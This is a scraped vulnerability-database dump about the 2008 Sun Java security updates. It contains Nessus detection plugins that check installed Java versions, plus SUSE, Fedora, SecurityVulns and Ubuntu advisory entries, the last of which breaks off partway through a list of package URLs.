script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019798.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019799.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019800.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/6u11-139394.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/releasenotes-142123.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/releasenotes-138306.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Sun Java JDK / JRE 6 Update 11, JDK / JRE 5.0 Update 17, \nSDK / JRE 1.4.2_19, or SDK / JRE 1.3.1_24 or later and \nremove if necessary any affected versions.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/12/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2008/12/03\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"sun_java_jre_installed.nasl\");\n script_require_keys(\"SMB/Java/JRE/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\n# Check each installed JRE.\ninstalls = get_kb_list(\"SMB/Java/JRE/*\");\nif (isnull(installs)) exit(1, \"The 'SMB/Java/JRE/' KB item is missing.\");\n\ninfo = \"\";\nvuln = 0;\ninstalled_versions = \"\";\n\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"SMB/Java/JRE/\";\n if (ver =~ \"^[0-9.]+\")\n installed_versions = installed_versions + \" & \" + ver;\n if (\n ver =~ \"^1\\.6\\.0_(0[0-9]|10)([^0-9]|$)\" ||\n ver =~ \"^1\\.5\\.0_(0[0-9]|1[0-6])([^0-9]|$)\" ||\n ver =~ \"^1\\.4\\.([01]_|2_(0[0-9]|1[0-8]([^0-9]|$)))\" ||\n ver =~ \"^1\\.3\\.(0_|1_([01][0-9]|2[0-3]([^0-9]|$)))\"\n )\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.6.0_11 / 1.5.0_17 / 1.4.2_19 / 1.3.1_24\\n';\n }\n}\n\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report =\n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n info;\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse\n{\n installed_versions = substr(installed_versions, 3);\n if (\" & \" >< installed_versions)\n exit(0, \"The Java \"+installed_versions+\" installs on the remote host are not affected.\");\n else\n exit(0, \"The Java \"+installed_versions+\" install on the remote host is not affected.\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:45:10", "description": "The version update to SUN Java 1.6.0_11-b03 fixes numerous security\nissues such as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)", "edition": 24, "published": "2009-01-07T00:00:00", "title": "openSUSE 10 Security Update : java-1_6_0-sun (java-1_6_0-sun-5876)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-01-07T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_6_0-sun-debuginfo", "p-cpe:/a:novell:opensuse:java-1_6_0-sun", "cpe:/o:novell:opensuse:10.3", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-demo", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc"], "id": "SUSE_JAVA-1_6_0-SUN-5876.NASL", "href": "https://www.tenable.com/plugins/nessus/35306", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_6_0-sun-5876.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35306);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"openSUSE 10 Security Update : java-1_6_0-sun (java-1_6_0-sun-5876)\");\n script_summary(english:\"Check for the java-1_6_0-sun-5876 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The version update to SUN Java 1.6.0_11-b03 fixes numerous security\nissues such as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_6_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/01/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-alsa-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-debuginfo-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-demo-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-devel-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-jdbc-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-plugin-1.6.0.u11-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_6_0-sun / java-1_6_0-sun-alsa / java-1_6_0-sun-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:22:58", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "Sun Java received several security fixes and was updated to: - Sun Java 1.6.0 to Update 11-b03 - Sun Java 1.5.0 to Update 17 - Sun Java 1.4.2 to Update 19 Numerous security issues such as privilege escalations, and sandbox breakouts were fixed. (CVE-2008-5360, CVE-2008-5359, CVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344, CVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340, CVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354, CVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350, CVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345, CVE-2008-5346)\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2009-01-09T15:49:38", "published": "2009-01-09T15:49:38", "id": "SUSE-SA:2009:001", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-01/msg00001.html", "type": "suse", "title": "remote code execution in Sun Java", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:35:28", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "description": "The IBM Java 1.4.2 JDK and JRE were brought to Service Release 13 and the IBM JDK and JRE 6 were brought to Service Release 4.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2009-04-07T14:51:07", "published": "2009-04-07T14:51:07", "id": "SUSE-SA:2009:018", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-04/msg00004.html", "type": "suse", "title": "remote code execution in IBM Java 1.4.2 and 6", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:19:44", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "description": "The IBM Java JRE 5 was brought to Service Release 9 fixing quite a number of security issues and bugs.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2009-01-29T14:08:00", "published": "2009-01-29T14:08:00", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-01/msg00009.html", "id": "SUSE-SA:2009:007", "title": "local privilege escalation in IBMJava5-JRE,java-1_5_0-ibm", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5359", "CVE-2008-5360"], "description": "The OpenJDK runtime environment. ", "modified": "2008-12-07T04:33:22", "published": "2008-12-07T04:33:22", "id": "FEDORA:2B4E3208DD6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: java-1.6.0-openjdk-1.6.0.0-7.b12.fc10", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5359", "CVE-2008-5360"], "description": "The OpenJDK runtime environment. ", "modified": "2008-12-07T04:27:51", "published": "2008-12-07T04:27:51", "id": "FEDORA:F07BD208DD2", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: java-1.6.0-openjdk-1.6.0.0-0.20.b09.fc9", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:31", "bulletinFamily": "software", "cvelist": ["CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5360", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "JNLP may overwrite system properties java.home\r\njava.ext.dirs\r\nuser.home\r\nHeap overflow and integer overflow on TrueType fonts parsing, memory corruption on GIF parsing, integer overflow on Pack200 decompression. Multiple sendbox protection bypass vulnerabilities.", "edition": 1, "modified": "2009-04-23T00:00:00", "published": "2009-04-23T00:00:00", "id": "SECURITYVULNS:VULN:9483", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9483", "title": "Sun Java JRE / JDK / Web Start multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:29", "bulletinFamily": "software", "cvelist": ["CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5360", "CVE-2008-5358", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "===========================================================\r\nUbuntu Security Notice USN-713-1 January 27, 2009\r\nopenjdk-6 vulnerabilities\r\nCVE-2008-5347, CVE-2008-5348, CVE-2008-5349, CVE-2008-5350,\r\nCVE-2008-5351, CVE-2008-5352, CVE-2008-5353, CVE-2008-5354,\r\nCVE-2008-5358, CVE-2008-5359, CVE-2008-5360\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 8.10\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 8.10:\r\n icedtea6-plugin 6b12-0ubuntu6.1\r\n openjdk-6-jdk 6b12-0ubuntu6.1\r\n openjdk-6-jre 6b12-0ubuntu6.1\r\n openjdk-6-jre-headless 6b12-0ubuntu6.1\r\n openjdk-6-jre-lib 6b12-0ubuntu6.1\r\n\r\nAfter a standard system upgrade you need to restart any Java applications\r\nto effect the necessary changes.\r\n\r\nDetails follow:\r\n\r\nIt was discovered that Java did not correctly handle untrusted applets.\r\nIf a user were tricked into running a malicious applet, a remote attacker\r\ncould gain user privileges, or list directory contents. (CVE-2008-5347,\r\nCVE-2008-5350)\r\n\r\nIt was discovered that Kerberos authentication and RSA public key\r\nprocessing were not correctly handled in Java. A remote attacker\r\ncould exploit these flaws to cause a denial of service. (CVE-2008-5348,\r\nCVE-2008-5349)\r\n\r\nIt was discovered that Java accepted UTF-8 encodings that might be\r\nhandled incorrectly by certain applications. A remote attacker could\r\nbypass string filters, possible leading to other exploits. (CVE-2008-5351)\r\n\r\nOverflows were discovered in Java JAR processing. If a user or\r\nautomated system were tricked into processing a malicious JAR file,\r\na remote attacker could crash the application, leading to a denial of\r\nservice. (CVE-2008-5352, CVE-2008-5354)\r\n\r\nIt was discovered that Java calendar objects were not unserialized safely.\r\nIf a user or automated system were tricked into processing a specially\r\ncrafted calendar object, a remote attacker could execute arbitrary code\r\nwith user privileges. (CVE-2008-5353)\r\n\r\nIt was discovered that the Java image handling code could lead to memory\r\ncorruption. If a user or automated system were tricked into processing\r\na specially crafted image, a remote attacker could crash the application,\r\nleading to a denial of service. (CVE-2008-5358, CVE-2008-5359)\r\n\r\nIt was discovered that temporary files created by Java had predictable\r\nnames. If a user or automated system were tricked into processing a\r\nspecially crafted JAR file, a remote attacker could overwrite sensitive\r\ninformation. (CVE-2008-5360)\r\n\r\n\r\nUpdated packages for Ubuntu 8.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12-0ubuntu6.1.diff.gz\r\n Size/MD5: 222090 25681e25a40ae36385d2429e8b905009\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12-0ubuntu6.1.dsc\r\n Size/MD5: 2355 281bc682638116538e829499572e3cde\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12.orig.tar.gz\r\n Size/MD5: 54363262 f3aa01206f2192464b998fb7cc550686\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-doc_6b12-0ubuntu6.1_all.deb\r\n Size/MD5: 8468244 7746db24f22ff25e7655bd9ad73b7077\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-lib_6b12-0ubuntu6.1_all.deb\r\n Size/MD5: 4708568 3e9ffbcebcadc431e5c1a21b80e9a9b7\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-source_6b12-0ubuntu6.1_all.deb\r\n Size/MD5: 25619670 4eb18b9cdd11778e80ce6b1ac63c2040\r\n http://security.ubuntu.com/ubuntu/pool/universe/o/openjdk-6/openjdk-6-source-files_6b12-0ubuntu6.1_all.deb\r\n Size/MD5: 49156890 044fa2fafc22c35568c01e46f85dbf0a\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 81028 8f3c35e45a001a5bb5e7d7231656e206\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 47370572 db9493bf071aa08183a7aeef6efc71ea\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 2366078 639ac32c62c5b951a77a0a58fcf8ee70\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 9942620 ac6600eb8cddc9afd55d37a646ba3a89\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 24087518 d9b0e9f7a0f6df9392eed8c67fa77acd\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 241532 404e268000d8d15e903f67eb4383146e\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 71520 9af6963e6ddc977bd05a8dbbe40f1139\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 101844924 fcdcbeacbb5f2854f68efa196e6d0ab3\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 2348616 6313881219ebbee2ee650685bcb6105f\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 9949838 366df23097c855e2d329dec6bf9f9d24\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 25169062 1354f7327a8df3422a442f37b357f77a\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 230678 59ed425557f18fba815bcbf9b17c6d1d\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 72102 c3317b35cd38f7b4ab607bf49331e440\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 101930608 292954d99c81b528891824548c6b885e\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 2345410 fc2cd7ec4e96749e39307f756231fdc3\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 9945176 4a8fb4a2b021f7ce6729dca9b0eef67c\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 25192978 cccb11f6580b47ab30c981a0a8cea0f6\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 227450 abf58752fcf129175266e60b86857f8c\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 77056 790776ea3f41a2392e6c9666402428c0\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 35896200 55947cfd47a40e248a626adcb601b4da\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 2393068 c475228e916c602eea348b0382f51f21\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 8599254 97e338f60e55a488ef0ba06bc23cf414\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 22974726 e3bf13b8599a94a0b89f2757a90800f5\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 255456 54b666eaaf464931a56406d09cfff088\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 70100 b4addb80ceb8e01dd8819a1bc3b8c89a\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 103684964 9f7150e6e1675831b723cdbae5b5c963\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 2355110 38f63636383fcb60ba60552ca4e0c60c\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 9927636 